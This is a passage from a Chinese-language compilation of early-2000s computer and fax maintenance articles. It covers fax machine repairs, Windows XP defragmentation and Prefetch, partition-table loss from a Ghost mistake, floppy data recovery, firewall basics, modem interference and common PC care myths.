    分析处理：打开纸仓，按住纸仓内左侧的绿色转轮上部，一边顺着箭头方向（逆时针方向）转动，直到齿轮上的红色标志出现在绿色转轮的前方为止，当再次放好记录纸后，接通电源，故障依旧。拆下机器的底板，取出主电路板，发现主板上CN1301接插件的第9芯插针脱落，并且已经弯曲，没有插至电话手柄座下的电路板上。经了解，该机曾维修过，估计是装配时，由于针和孔不对位，造成第9芯从原来的一排插针上脱落。把第9芯插针弄直并用热熔胶与其余8芯插针排整齐粘牢，由于CN1301较难装，厂家在生产制造时也考虑到了这一问题，特意在CN1301旁开了两个方孔，用台灯照看这两个孔，可以方便地观察CN1301是否插好。插好CN1301，装好主电路板及底板，开机复印时没有再报卡纸错误，但复印件仍为全黑。按面板上的“功能”键，再按“选择”键，选中“Report”（报告），打印出的内容仍为全黑，根据复印时扫描头CIS有黄绿光发出，说明CIS是好的，由此可肯定是记录头（TPH）损坏，更换记录头后，机器工作正常，故障排除。
    故障现象三：一台松下UF－108M传真机，复印时，液晶显示器显示“004”故障代码，并有报警声。
    分析处理：打开机器前盖，发现记录纸只切了一小段，但并没有被切断，用手将切纸刀（一个小不锈钢圆片）沿原切纸方向往前推，直到终点把记录纸切断，装好记录纸，盖好前盖，复印时故障依旧。拆下切纸刀组件，发现由于刀片太薄，动刀产生了一定的扭曲现象，在平板上把刀片弄平整，并用油石磨一下刃口（包括动刀和定刀），使其锋利，把切纸刀组件用软布擦拭干净，装上机器，开机复印正常，故障排除。


磁盘的碎片整理

《一键清理系统垃圾》

磁盘的碎片整理

    如果你使用Windows XP操作系统，那么请注意磁盘碎片整理的问题。

    1.为什么要需要整理碎片

    磁盘上的文件布局会强烈地影响I/O性能，严重碎片化的或散布在磁盘中的文件和目录会损害性能，虽然Windows XP会自动重定位某些文件来改善性能，但通常情况下，这并非属于系统必须的常规，而且通常情况下也仅包含磁盘上很小部分的文件。

    从这方面来考虑，应该在系统安装结束后立即对磁盘进行完整的碎片整理。默认情况下，WindowsXP每隔3天就会执行一次局部碎片整理，并根据当天的使用情况调整文件在磁盘上的物理位置，所移动的文件将被写入Layout.ini文件，这是Windows XP认为应该按照这一顺序来安排文件在磁盘上的物理位置，该文件的路径在C:\Windows\Prefetch。

    系统在空闲时会自动整理磁盘碎片，此时会首先读取Layout.ini文件中的内容，并针对其中涉及的文件进行局部的碎片整理，这也是磁盘整理程序转移文件位置的依据。

    2.深入认识Prefetch目录

    在Windows XP及其以后的操作系统中，增加了预读取功能(也可以理解为“预先装载”)，该功能可以提高系统的性能，加快系统的启动、文件读取的速度，这些预读文件保存在％systemroot％\Prefetch目录中，以*.pf为扩展名，这些*.pf文件包括了载入文件的详细信息和载入顺序。

    每一个应用程序，包括Windows XP的启动过程，都会在PrefetCh目录下留下相应的预读取文件，预读取文件描述了应用程序或启动时各个模块的装载顺序，其命名方式是以应用程序的可执行文件的名字为基础，加上一个“-”和描述执行文件完整路径的十六进制值，再加上文件扩展名.pf，例如QQ.EX-0065A2A1.pf。每当用户启动一个程序，会自动在Prefetch目录中对应的*.pf文件中留下一条记录。不过，Windows XP启动的预读取文件总是同一个名称，即NTOSBOOT-B00DFAAD.PF，其中包含着启动时载入文件的记录。

    当下一次启动系统或运行某个程序时，Windows会参考相应的*.pf文件，将其中记录的所有文件载入内存，而不是象以往一项一项依指令逐个载入文件。另外，Windows会利用启动程序或程序的*.pf文件制订一个最优化的磁盘分配方案，这个方案的相关信息存储在Lyaout.ini文件中。

    3.不让系统自动整理磁盘碎片

    有时候，你可能会觉得局部碎片整理的功能非常无聊，因为磁盘的碎片整理也会对硬盘进行某种程度的操作。网上流传着关于通过修改注册表键值来禁用局部碎片整理的技巧，看似有理，但事实上，这些所谓技巧是完全无效的。事实上，你即使将C:\Windows\Prefetch\目录下的文件全部删除，重新启动系统后仍旧会自动创建Layout.ini文件，届时3天1次的局部碎片自动整理功能会被重新激活。闪此正确的方法是用记事本打开Layout.ini文件，将其中的内容全部删除，并将这个文件设置为只读属性，这样Windows XP就无法激活局部碎片自动整理功能了，当然你也就不用担心C:\Windows\Prefetch\会变得越来越庞大。

    4.一步的讨论

    我们经常可以从网上看到关于修改注册表键值以提高Windows XP启动速度的技巧，这些技巧真的是有效的吗？下面，我们结合磁盘碎片整理的实例来进行深入一步的探讨：

    问题一：C盘为什么无法进行碎片整理？

    Windows XP系统，在对C盘进行碎片整理时，提示由于C:\Windows\prefetch\WMIPRVSE.EXE-28F301A9.PF文件损坏，扫描无法继续。

    C:\Windows\Prefetch\是Windows XP的预读文件夹，Windows XP将频繁使用的数据存放在预读文件夹中，需要再次使用这些数据时可以大大加快读取速度，但随着时间的增长，这个文件夹的个头会变得越来越大，而且可能会存在一些死链文件，此时如果执行碎片整理，就有可能出现上面提到的错误，解决的办法是清空这个文件夹，然后整理碎片。
    问题二：启动时也能整理碎片？

    Windows XP可以在启动时进行碎片整理，使那些启动所必须的文件能够相邻排列，从而在下次启动时提高速度，不过该功能在默认设置下是被关闭了的。激活的办法是打开注册表编辑器，找到HKEY_LOCAL_MAHCINE\SOFTWARE\Dfrg\BootOptimizeFunetion，双击右侧窗格中的Enable键，将键值由默认的“N”修改为“Y”即可。

    问题三：禁止预读取后能提高系统的启动速度吗？

    网络上流传着1条关于提升Windsws XP启动速度的技巧，具体方法是通过修改注册表中HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters目录下EnablePrefeteher子键，将它的键值赋为“1”。这样可以减少预读取的文件，减少进度条等待时间，效果是进度条跑一圈就进入登录画面了。

    微软的技术文档解释了EnablePrefetcher被赋予不同值的含义：
    0：取消预读取功能；
    1：只预读取应用程序；
    2：只预读取Windows系统文件。
    3：预读取Windows系统文件和应用程序，这是WindowsXP的默认值。

    虽然EnablePrefetcher键值设置为1后，的确可以减少预读取的文件，但系统初始化内核的工作是一个非常复杂的过程，此时需要加载很多底层的驱动程序、启动子系统以及相关的服务，即使是当我们看到了欢迎屏幕，也不能认为此时系统已经启动完成，因为系统会在后台继续初始化那些未完成的驱动程序的加载工作，虽然滚动条的动作次数较以前大大减少，但在显示欢迎屏幕之前的黑屏过程却反而有所增加，因此总的系统时间并未变化。


从Ghost误刷分区表说起

《一键清理系统垃圾》

从Ghost误刷分区表说起

曾近有一个完美的硬盘摆在我的面前，我没有好好去珍惜，等到了失去的时候，我才后悔莫及……

有许多数据的丢失都是由硬盘的分区表丢失或出错造成的，而分区表的丢失或受损很多则是由误操作引起的。笔者上次用ghost恢复系统，由于错选了选项，导致硬盘里20G的数据丢失：（
事情是这样发生的。由于系统用久了垃圾自然就多，速度也慢。因此笔者就打算用ghost恢复以前做过优化的干净系统。但谁知一进入纯DOS，键入ghost，选local－image to到分区功能进行恢复时。笔者竟犯下了错。本应该选择local-partition-from image-e:-win.ghost来恢复系统（覆盖C盘）的，然而手指一滑，错选成了local-disk-from image-e:-win.ghost，当时也没有细看，一路Enter确认下去。等到数据覆盖完毕后，重启系统，进入桌面，才发现硬盘里所有分区的数据都没了，除了刚才覆盖写入的c盘。

为什么会这样呢，呜呜，笔者马上回忆刚才的步骤。发现错在误选了disk的选项。Disk的音译为硬盘。选了local-disk-from image就意味着ghost会把备份文件覆盖到整个硬盘，同时，原来正常的分区表也要被覆盖。由于硬盘中的数据是保存在不同的区里的，分区表一被改动，各个区的数据就算存在也不会被找不出来。
这时候，笔者还有无恢复数据的希望呢，暂且不提。先假设有个硬盘，分了3个区（c:2g d:8g e:5g）进行下面的操作。误用ghost的disk-from image将win.ghost（1.1g容量）覆盖到硬盘的c盘上，覆盖完毕，整个硬盘就会只看到c盘，数据有1.1个g。这时候，如果马上用诸如EasyRecovery的软件来挽救数据是可能的，也是可行的（但笔者是事后才在家电上看到该软件的介绍）但用EasyRecovery必须有个前提，就是d区和e区的数据没有经过读写操作。也可以这样来说，如果同样是上面的操作。不过win98.gho这个镜像文件的容量为2.2g，误用ghost的disk功能覆盖下去，数据在填满c盘的2G同时，剩下的0.2G还会覆盖到D盘。这样，即使马上用easyrecover来恢复，d盘的数据也不可能了。因为这2.2g在ghost作用下不但覆盖了分区表还改动了d盘的数据。

其实，还有一个最简单的恢复数据的方法，就是重写硬盘的分区表。要重写，就必须先备份分区表了（虽然笔者事先备份了分区表，可也不能挽救数据，为何！：（备份分区表的软盘恰巧读不出来）所以一定要准备一张上好的软盘，然后用诸如raving 的软件进行备份：方法为：插入raving的A盘，dos下输入A：rav，待程序执行完毕后，选择瑞星杀毒实用工具菜单下的备份引导区信息，然后按提示放入软盘，以进行分区表的备份。完毕后，就会在软盘上生成一个32K的Boot.rav的文件，那就是分区表的信息了。如果此后分区表不幸886了，就可以用rav的A盘来恢复，即改bios从软盘启动，然后入raving的A盘，选择实用工具菜单下的恢复引导区信息就可以了。

末了，笔者还想说一句，分区表真的很重要，朋友们一定要备份，特别是爱用ghost的朋友们。


从受损软盘上抢救文件

《一键清理系统垃圾》

从受损软盘上抢救文件

我们在使用软盘的时候，经常会碰到软盘数据无法读取的情况。或许下面的方法可以试一试：

一、反复读盘法

在DOS下用Copy命令复制文件，无法读取时选择Retry重复读取。事实上，Windows下也可用此法，但成功的可能性不如DOS。

二、修复软盘法

用ScanDisk或Norton等工具软件对软盘扫描并进行修复。这样，或许能在修复后读出软盘上的数据。

三、强行转移法

先用HDCopy95（或HDWin、Bad-Copy等）读源软盘（也就是无法读数据那张盘），读数据完成后换一张已经格式化的新软盘，点击“Write”将数据写入，完成后再将新软盘上的文件复制到硬盘。由于HDCopyru软件在读坏盘时会自动在无法读出的地方写入其他数据很可能会是程序文件无法运行，而且有时会把整张软盘的所有目录、文件变成不可用的乱码。但是此法较适合拷贝文档。

四、蒙混过关法（选用ACDSee3.0等工具软件）

软盘上的压缩文件损坏无法复制，用WinZip 8.0也无法打开，用WinZip 8.0创建自解压文件也不行。看来得用ACD-See 3.0了。打开ACD-See3.0 Browser,双击压缩文件，文件全都存放在里面，一切正常。


带你认识防火墙技术

《一键清理系统垃圾》

带你认识防火墙技术

    网络的安全不仅表现在网络的病毒防治方面，而且还表现在系统抵抗外来非法黑客入侵的能力方面。对于网络病毒，我们可以通过KV300或瑞星杀毒软件来对付，那么对于防范黑客的入侵我们能采取什么样的措施呢？在这样的情况下，网络防火墙技术便应运而生了。那么究竟什么叫防火墙呢？它有什么作用呢？请大家耐心往下看。
    一、防火墙的基本概念
古时候，人们常在寓所之间砌起一道砖墙，一旦火灾发生，它能够防止火势蔓延到别的寓所。现在，如果一个网络接到了Internet上面，它的用户就可以访问外部世界并与之通信。但同时，外部世界也同样可以访问该网络并与之交互。为安全起见，可以在该网络和Internet之间插入一个中介系统，竖起一道安全屏障。这道屏障的作用是阻断来自外部通过网络对本网络的威胁和入侵， 提供扼守本网络的安全和审计的唯一关卡，它的作用与古时候的防火砖墙有类似之处，因此我们把这个屏障就叫做“防火墙”。
    在电脑中，防火墙是一种装置，它是由软件或硬件设备组合而成，通常处于企业的内部局域网与Internet之间，限制Internet用户对内部网络的访问以及管理内部用户访问外界的权限。换言之，防火墙是一个位于被认为是安全和可信的内部网络与一个被认为是不那么安全和可信的外部网络(通常是Internet)之间的一个封锁工具。防火墙是一种被动的技术，因为它假设了网络边界的存在，它对内部的非法访问难以有效地控制。因此防火墙只适合于相对独立的网络，例如企业内部的局域网络等。
    二、防火墙的基本准则
   1.过滤不安全服务
    基于这个准则，防火墙应封锁所有信息流，然后对希望提供的安全服务逐项开放，对不安全的服务或可能有安全隐患的服务一律扼杀在萌芽之中。这是一种非常有效实用的方法，可以造成一种十分安全的环境，因为只有经过仔细挑选的服务才能允许用户使用。
   2.过滤非法用户和访问特殊站点
    基于这个准则，防火墙应先允许所有的用户和站点对内部网络的访问，然后网络管理员按照IP地址对未授权的用户或不信任的站点进行逐项屏蔽。这种方法构成了一种更为灵活的应用环境，网络管理员可以针对不同的服务面向不同的用户开放，也就是能自由地设置各个用户的不同访问权限。
    三、防火墙的基本措施
    防火墙安全功能的实现主要采用两种措施。
    1.代理服务器(适用于拨号上网)
   这种方式是内部网络与Internet不直接通讯，内部网络计算机用户与代理服务器采用一种通讯方式，即提供内部网络协议（NetBIOS、TCP/IP），代理服务器与Internet之间的通信采取的是标准TCP/IP网络通信协议，防火墙内外的计算机的通信是通过代理服务器来中转实现的，结构如下所示:

    内部网络→代理服务器→Internet
    这样便成功地实现了防火墙内外计算机系统的隔离，由于代理服务器两端采用的是不同的协议标准，所以能够有效地阻止外界直接非法入侵。
    代理服务器通常由性能好、处理速度快、容量大的计算机来充当，在功能上是作为内部网络与Internet的连接者，它对于内部网络来说像一台真正的服务器一样，而对于互联网上的服务器来说，它又是一台客户机。当代理服务器接受到用户的请求以后，会检查用户请求的站点是否符合设定要求，如果允许用户访问该站点的话，代理服务器就会和那个站点连接，以取回所需信息再转发给用户。
    另外，代理服务器还能提供更为安全的选项，例如它可以实施较强的数据流的监控、过滤、记录和报告功能，还可以提供极好的访问控制、登录能力以及地址转换能力。但是这种防火墙措施，在内部网络终端机很多的情况下，效率必然会受到影响，代理服务器负担很重，并且许多访问Internet的客户软件在内部网络计算机中无法正常访问Internet。
    2.路由器和过滤器
    这种结构由路由器和过滤器共同完成对外界计算机访问内部网络的限制，也可以指定或限制内部网络访问Internet。路由器只对过滤器上的特定端口上的数据通讯加以路由，过滤器的主要功能就是在网络层中对数据包实施有选择的通过，依照IP（Internet Protocol）包信息为基础，根据IP源地址、IP目标地址、封装协议端口号，确定它是否允许该数据包通过。这种防火墙措施最大的优点就是它对于用户来说是透明的，也就是说不须用户输入账号和密码来登录，因此速度比代理服务器快，且不容易出现瓶颈现象。然而其缺点也是很明显的，就是没有用户的使用记录，这样我们就不能从访问记录中发现非法入侵的攻击记录。

作者：周勇生
来源：CPCW


电磁干扰对Modem的影响

《一键清理系统垃圾》

电磁干扰对Modem的影响

    本人于去年12月买回金浪56K内置Modem一个。型号为PCI 56 CIRRUS LOGIC VOICE。一路小跑回家准备把它安装在“老机”上。把Modem插在第一个PCI插槽里；开机后，WIN98自检到新硬件。放入驱动光盘，接下来一路确认完成了安装。可是上网的时候问题来了，只听见小猫叫了一声就没反应了。屏幕显示“ 错误：630 拨号网络无法完成该连接，调制解调器没有正常响应。请检测是否调制解调器已经连接计算机与电话线路”。难道是接触不良？将电脑关闭后把Modem重新插好，然后开机。第一次上网没问题，5分钟后切断连接重新上网，又出现 “错误：630”的提示。听说有些主板的第一个PCI插槽的兼容性有问题。于是在每个PCI插槽上都试了一遍，均不能正常工作。每次都显示“错误：630”的提示。
        重装了一遍驱动程序，还是没有解决问题。一次偶然把手放在Modem上（其实是不小心的，很危险）。调制解调器竟然工作了，又试了很多次，只要是把手放在Modem上，小猫就会欢快地飞奔上网。难道是电磁干扰吗？我将一块剪成Modem大小的铁片用塑料袋包好粘在Modem的有元件的一面（最好能在铁板上连一根地线接到机箱上）。问题解决了，至今已用一月有余，没有发现问题。
        分析：因为机箱内的电磁波很强，干扰调制解调器。也许这就是内置猫不如外置猫稳定性好的一个主要原因之一吧！你是否也曾经遇到过类似的问题呢，不妨试试加以屏蔽的方法（有人用香烟中的锡箔做屏蔽的方法并不可取，学过电子技术的人都知道，只有导磁率高的金属才能做屏蔽材料，比如铁，镍等。锡箔虽然导电但不导磁，只能在一定程度上将静电屏蔽，对于磁场它无能为力）。


电脑操作误区面面观

《一键清理系统垃圾》

电脑操作误区面面观

    随着IT产品的日益平民化，很多家庭都购置了家用电脑。因为电脑水平的参差不齐，难免有一些“菜鸟”甚至是“大虾”在电脑的操作上或多或少存在一些想当然的误操作，有些看似不经意的误操作可能会使您的电脑即刻“归西”，甚至会伤害到您的身体健康。基于此，笔者特将在长期使用电脑中积累的经验和应该注意的误区“和盘托出”，以期大家提高电脑水平趋利避害，让电脑更好为我们工作和忠实服务。

    误区之一：清洁显示器要用高纯度的无水酒精

    显示器作为人机交换的重要媒介，其屏幕使用日久难免粘有灰尘和污渍。很多朋友想当然的认为酒精尤其是高纯度（95%以上）的是最好的清洁剂。事实正好相反，现在的显示器（CRT类型）一般都在屏幕上有一层特殊的防护涂层，用来防静电和眩光，酒精作为一种良好的有机溶剂非常容易破坏掉这个特殊的涂层，给显示器的显示效果大打折扣。

    正确做法：显示器的屏幕包括其外壳，都不能使用酒精、汽油、洗衣粉等溶剂，如果有条件请使用专门的显示器清洁剂。如果条件不具备，可以到市场上购买几瓶纯净水进行显示器屏幕和外壳的清洁。另外，对屏幕清洁时特别小心，不要使用普通的粗毛巾，应购买1~2块质量较好的眼镜布代之。

    误区之二：打开机箱，让机箱内的电脑配件“裸奔”才是最好的散热

    夏日已至，很多“菜鸟”甚至包括很多DIYer为了加强散热或方便拆装硬件，都不约而同地选择了廉价又方便的散热方案——让电脑“裸奔”。可是，我认为此举非常不当。其一，虽解决了散热，但机箱“开膛破肚”让硬件裸露在外容易积攒灰尘，长此以往“灰尘”也会成为电脑的杀手。其二，这种做法非常的有害人体的健康。众所周知，CPU、主板、电源等硬件都是高电磁辐射源，而机箱为我们屏蔽了绝大部分的电磁辐射，是我们健康使用电脑的“保护神”。如果仅仅为了散热，而让我们的身体直接暴露在高电磁辐射下，拿健康开玩笑是得不偿失的。

    误区之三：关机后马上盖上防尘罩

    很多朋友在购买新电脑后非常注意电脑的防尘，专门定做了防尘罩，这本无可厚非，但是关机后马上罩上防尘罩就不可取了。原来，关机后机箱内、显示器还有大量的热量未散发出来，各种电子元件的温度都很高，需要有一个逐渐的散热过程，如果马上盖上防尘罩，非常不利于硬件的散热，甚至严重影响其使用寿命。

    正确做法：关机1~2小时后，待机箱内热量散出才可使用防尘罩。

    误区之四：带电热插拔各种电脑外设

    很多朋友在进行各种硬件操作时，为图省事经常在未关机的情况下带电插拔PS/2接口的鼠标、键盘和各种串、并口设备。这些都是看似平常，但却很危险的操作，轻则造成系统或硬件工作不正常，重则造成硬件接口或主板的损坏。

    正确做法：除了USB、IEEE1394接口和串口硬盘外，一般普通台式机各种外设均不可带电热插拔，所以朋友们在进行其他硬件操作时不要怕麻烦，一定要在关机断电的情况下进行正确的操作，以免造成不必要的损失。

    误区之五：接触电脑硬件，对静电不设防

    很多朋友虽然在潜意识中都知道静电是电脑硬件潜在的“杀手”，但是由于重视程度不够，更加之操作的惰性以及存在的侥幸心理，往往进行“违规”的硬件操作，以致“火花”轻轻一闪，电脑内的主板、内存、显卡等部件在短短的瞬间就“香消玉殒”了。由于静电在我们的生活中无处不在，在我们接触和维修电脑时非常容易积累大量的静电，因此必须采取有效措施以避免静电给电脑内的高精密部件带来的致命损害。

    正确做法：首先要保证电脑机箱的可靠接地，在打开电脑主机箱接触电脑硬件前，最好用手与机箱外部的金属部分或其他的接地金属接触一下，通过短暂的接触来释放身体上所带有的静电。另外对于拆下的电脑硬件可以放入防静电塑料袋中妥善保存，在进行硬件的敏感操作时通过佩戴防静电环能起到很好的防静电作用。最后，静电的产生和释放具有季节性，在冬天尤为明显，所以更应提高警惕谨慎操作。

    误区之六：光驱当成“影碟机”，“清洗”光盘变杀手

    不少朋友现在都配备了CD或DVD光驱，为了实现看盘工作两不误，经常用光驱播放普通的VCD、DVCD和DVD影碟。其实，这是一个很不好的习惯。虽然这样做暂时方便了自己，但长此以往会大大缩短光驱的使用寿命最后使之“报废”。主要原因是光驱在读取普通盘片时就要频繁改变电机转速和激光头频率，时间长了就会造成光驱机械部件磨损和激光头严重老化。

    正确做法：出于保养光驱的考虑，您可以将自己喜爱的影碟拷入电脑的硬盘内慢慢欣赏，应该尽量少用和不用光驱看影碟，更不能把光驱当成影碟机！

    光驱作为一种易耗品，在使用一段时间后往往会不同程度地出现读盘能力下降的问题，这时很多朋友多有“聪明之举”——借用清洗影碟机的普通清洗光盘对光驱进行清洁，以图提高或恢复光驱的读盘能力。这其实又是一个认识上的误区：家用的影碟机包括VCD、DVD由于工作原理不同，其倍速比较低一般为2X、4X，使用清洗光盘能起到一定的清洗作用；但是现在的光驱的倍速常常在52X左右，这时的清洗盘非但起不到应有的作用，反之由于光盘的高速旋转不仅会划伤甚至是撞歪激光头，成为不折不扣的光驱“杀手”

    正确做法：如果欲改善光驱的读盘能力，可以请专业的人士打开光驱用棉球清洗或适当增加激光头的发射功率。当然最好的办法是平时注重对光驱的呵护和保养。

    小提示：1． 光驱正在读盘即光驱灯亮时也不要强行按下光驱面板上的弹出键，最好等指示灯灭没有读盘动作时才能按下弹出键，否则长此以往易使光驱的主轴电机发生故障。

    2． 在放入光盘后，注意不要直接用手去推光盘托架以使光盘入仓，因为推的力度或角度的偏差容易造成光驱传动部分出现故障。正确的做法是按下弹出键使光盘托架自动回仓。

    3． 光盘读完后一定要及时取出，不可将其停滞在光驱内。因为虽然没有读写的操作，但是电脑每次启动还会自动检测和预读光驱，这样不但降低了系统的运行速度，对光驱的寿命也产生不利影响。

    误区之七：关机不必切断电源

    经常看到有些朋友在使用完电脑后，为图省事在系统里执行关机指令后一走了之，根本没有将主机的电源彻底切断（即拔下电源插座，从插线板上彻底移开），有时候甚至显示器和音箱等外设仍然在工作状态。这其实给电脑的硬件埋下了隐患，因为系统在关机状态下其实并没有完全切断电源，机箱内的电源、主板仍然和市电接通，一旦发生电压波动或者遭遇雷电天气极易造成主板、电源和各种外设的彻底损坏。在这里奉劝大家，为保险起见关机后一定要彻底切断电源。

作者：贾亚丁
来源：中国电脑教育报


电脑出现故障，没有过质保直接去找装机商，消费者没有任何义务寻找故障点

《一键清理系统垃圾》

电脑出现故障，没有过质保直接去找装机商，消费者没有任何义务寻找故障点

已经过质保期，建议去新世纪旁边的“巨兆”和对面的“江潮”，成都规模最大的两家维修商规模大，技术水平相对较高，操作相对规范，正常程序是先检查，然后告诉你修理需要多少钱，修不好不收钱

# 不要理会所有检测优化软件对你系统的所有建议，绝大部分都毫无价值，盲目听从反而很可能造成系统不稳定

# CPU降温软件并没有实际作用
只能在CPU占用率不高的时候期作用，但是占用率不高的时候CPU温度本来就不高，类似于
太阳能手电筒

# 开机后不能进入系统,出现NTLDR is missing.Press any key to restart your computer
用win98光盘启动进入Dos，输入fdisk/mbr

#　除非自己真的对电脑硬件感兴趣,没有特别的事情不要拆机箱，不要做清洁，很多脏的离谱的电脑，运行没有受到任何影响，而清洁时稍不注意把某个地方碰松了，就可能造成电脑无法启动、死机，甚至可以因为人体携带的静电烧毁板卡

#　开机后声音很大,怎么办?
刚开机声音非常大,用一段时间后就小了.
这种问题是由于风扇用的润滑油凝固点较高,加上混入一定量灰尘造成的.
开机一段时间后风扇得到加热,润滑油自然就融化了,开始发挥作用.而刚开机是没有润滑
油的作用,自然声音就比较大.这是正常现象,不用特别在意.由于灰尘已经凝入油内,清除
表面灰尘一般也不能解决问题.

#　电脑开机容易重启，有时候需要重启多次才能稳定运行?
电源、主板供电部分某些元器件品质欠佳，在低温状态下无法很好的工作，造成需要多次启
动，类似以前的汽车冬天需要给发动机预热
使用杂牌电源，主板或者使用时间较长主板容易出现此问题
解决方法，基本上只能是更换电源或者主板，除非你真有闲心用电吹风对着吹半天
ps：其他一些 因素仍然可能造成类似症状，比如铅笔连接金桥破解老毒龙倍频

#　每次开机的时候都会显示primary ide channel no 80 conductor cable installed?
你的在primary ide接口上的设备以及连上该设备的IDE控制器支持UDMA66(含UDMA66)以上的传输速度,而这种设备需要８０根的IDE线，但你当前用的是４０根的IDE线，使之传输速度只能达到33MB/S的极限速度，所以才会有这种显示。

#　为什么电脑总是自动开机？经常是一按下插线板的电源机子就自动开机？
BIOS 中 Power 部分得设置.after power failure　设为 Off


电脑的日常维护与故障诊断

《一键清理系统垃圾》

电脑的日常维护与故障诊断

  如何保养和维护好一台电脑，最大限度地延长使用寿命，是我们广大电脑爱好者非常关心的话题。
    一、环境
    环境对电脑寿命影响是不可忽视的。电脑理想的工作温度应在10℃～35℃，太高或太低都会影响计算机配件的寿命，条件许可时，计算机机房一定要安装空调，相对湿度应为30％～80％，太高会影响CPU、显卡等配件的性能发挥，甚至引起一些配件的短路。如：在南方天气较为潮湿，最好每天使用电脑或使电脑通电一段时间。有人认为使用电脑的次数少或使用的时间短，就能延长电脑寿命，这是片面、模糊的观点；相反，电脑长时间不用，由于潮湿或灰尘、汗渍等原因，会引起电脑配件的损坏。当然，如果天气潮湿到一定程度，如：显示器或机箱表面有水汽，此时绝对不能给机器通电，以免引起短路等不必要的损失。湿度太低易产生静电，同样对配件的使用不利。另外，空气中灰尘含量对电脑影响也较大。灰尘太大，天长日久就会腐蚀各配件、芯片的电路板；含量过小，则会产生静电反应。所以，计算机室最好有抽湿机和吸尘器。
    电脑对电源也有要求。交流电正常的范围应在220V±10％，频率范围是50Hz±5％，且具有良好的接地系统。条件允许时，使用UPS来保护电脑，使得电脑在市电中断时能继续运行一段时间。
    二、使用习惯
    良好的个人使用习惯对电脑的影响也很大。请正确执行开、关机顺序。开机的顺序是：先外设（如：打印机、扫描仪、UPS电源、MODEM等），显示器电源不与主机电源相连的，还要先打开显示器电源，然后再开主机；关机顺序则相反：先关主机，再关外设。其原因在于尽量地减少对主机的损害，因为在主机通电时，关闭外设的瞬间，会对主机产生较强的冲击电流。关机后一段时间内，不能频繁地开、关机，因为这样对各配件的冲击很大，尤其是对硬盘的损伤更严重。一般关机后距下一次开机时间至少应为10秒钟。特别要注意当电脑工作时，应避免进行关机操作。如：计算机正在读写数据时突然关机，很可能会损坏驱动器（硬盘、软驱等）；更不能在机器正常工作时搬动机器。关机时，应注意先退出Windows 95/98操作系统，关闭所有程序，再按正常关机顺序退出，否则有可能损坏应用程序。当然，即使机器未工作时，也应尽量避免搬动计算机，因过大的震动会对硬盘、主板之类配件造成损坏。
    三、硬件故障
    一般情况下，一台刚安装完毕的计算机出现故障的可能性较大，机器运行一段时间后，其故障率相对降低。对于硬件故障，我们只要了解各种配件的特性及常见故障排除的方法，就能逐一排除各个故障。
    1.接触不良的故障　接触不良一般反映在各种板、卡、内存、CPU等与主板的接触不良，或电源线、数据线、音频线等的连接不良。其中各种接口卡、内存与主板接触不良的现象较为常见，通常只要更换相应的插槽位置或用橡皮擦一擦金手指，就可排除故障。
    2.未正确设置参数　CMOS参数的设置主要有硬盘、软驱、内存的类型，以及口令、机器启动顺序、病毒警告开关等等。由于参数未设置或设置不当，系统均会提示出错的警告。
    3.硬件本身故障　硬件出现故障，除与其自身的质量有关外，也可能是因负荷太重或其它原因引起的，如电源的功率不足或CPU超频使用等，均可能引起计算机的故障。
    四、软件故障
    软件故障通常是由硬件驱动程序安装不当引起的。
    1.未安装驱动程序或驱动程序间产生冲突　则会在Windows 95/98操作系统下的资源管理器中发现一些标记，其中“？”表示未知设备，通常是设备没有正确安装；“！”表示设备间有冲突，“×”表示所安装的设备驱动程序不正确。
    2.病毒防治　病毒对电脑的危害是众所周知的，轻则影响机器速度，重则破坏文件或造成死机。为方便随时对电脑进行保养和维护，必须准备一些必要的工具，如干净的DOS启动盘或Windows 98启动盘，以及KV300杀病毒、Norton工具软件等，以应付系统感染病毒或硬盘不能启动时使用。此外还应准备各配件的驱动程序，如光驱、声卡、显示卡、MODEM等。


电脑的维护与故障诊断

《一键清理系统垃圾》

电脑的维护与故障诊断

    如何保养好你的电脑并且诊断故障呢？这是我们非常关心和经常面临的问题。
    一、 环境
    环境对电脑寿命影响是不可忽视的。电脑理想的工作温度应在10℃～35℃，太高或太低都会影响配件的寿命，相对湿度应为30％～80％，太高会影响电脑性能发挥，甚至引起短路。例如天气较为潮湿时，最好每天都使用电脑或使电脑通电一段时间。电脑长时间不用，由于潮湿或灰尘的原因，会引起配件的损坏。当然，如果天气潮湿到了极点，比如显示器或机箱表面有水汽，这时是绝对不能给机器通电的；而且湿度太低易产生静电，同样对配件的使用不利，另外，灰尘对电脑影响也较大。
    电脑对电源也有要求。交流电正常的范围应在220V±10％，频率范围是50Hz±5％，并且具有良好的接地系统。可能的情况下，使用UPS来保护电脑，使得电脑在市电中断时不至于突然关机。
    二、使用习惯
    个人使用习惯对电脑的影响也很大，首先是要正常开关机，开机的顺序是，先打开外设（如打印机，扫描仪等）的电源，然后再开主机电源。关机顺序相反，先关闭主机电源。其道理是，尽量地减少对主机的损害，因为在主机通电的情况下，关闭外设的瞬间，对主机产生的冲击较大。关机后一段时间内，最好不要频繁地做开机关机的动作，因为这样对各配件的冲击很大，尤其是对硬盘的损伤更为严重。一般关机后距离下一次开机的时间应有10秒钟。特别要注意当电脑工作时，应避免进行关机操作。如机器正在读写数据时突然关机，很可能会损坏驱动器（硬盘、软驱等）；更不能在电脑工作时搬动机器。当然，即使机器未工作时，也应尽量避免搬动机器，因为过大的振动会对硬盘一类的配件造成损坏。另外，关机时必须先关闭所有的程序，再按正常的顺序退出，否则有可能造成应用程序损坏，文件丢失。
    三、硬件故障
    安装好一台电脑后，难免会出现这样或那样的故障，这些故障可能是硬件的故障，也可是软件的故障。一般情况下，刚刚安装的机器出现故障的可能性较大，机器运行一段时间后，其故障率相对降低。对于硬件故障，我们只要了解各种配件的特性及常见故障的发生，就能逐个排除各个故障。
    1、接触不良的故障
    接触不良一般反映在各种卡类、内存、CPU等与主板的接触不良，或电源线、数据线、音频线等的连接不良。其中各种接口卡、内存与主板接触不良的现象较为常见，通常只要更换相应的插槽位置或用橡皮擦一擦金手指，就可排除故障。
    2、未正确设置参数
    CMOS参数的设置主要有硬盘、软驱、内存的类型，以及口令、机器启动顺序、病毒警告开关等等。由于参数没有设置或没有正确设置，系统都会提示出错。如病毒警告开关打开，则无法安置Windows 9x。
    3、硬件本身故障
    硬件出现故障，除了本身的质量问题外，也可能是负荷太大或其它原因引起的，如电源的功率不足或CPU超频使用等，都有可能引起机器的故障。
    四、软件故障
    软件故障通常是由硬件驱动程序安装不当引起的。
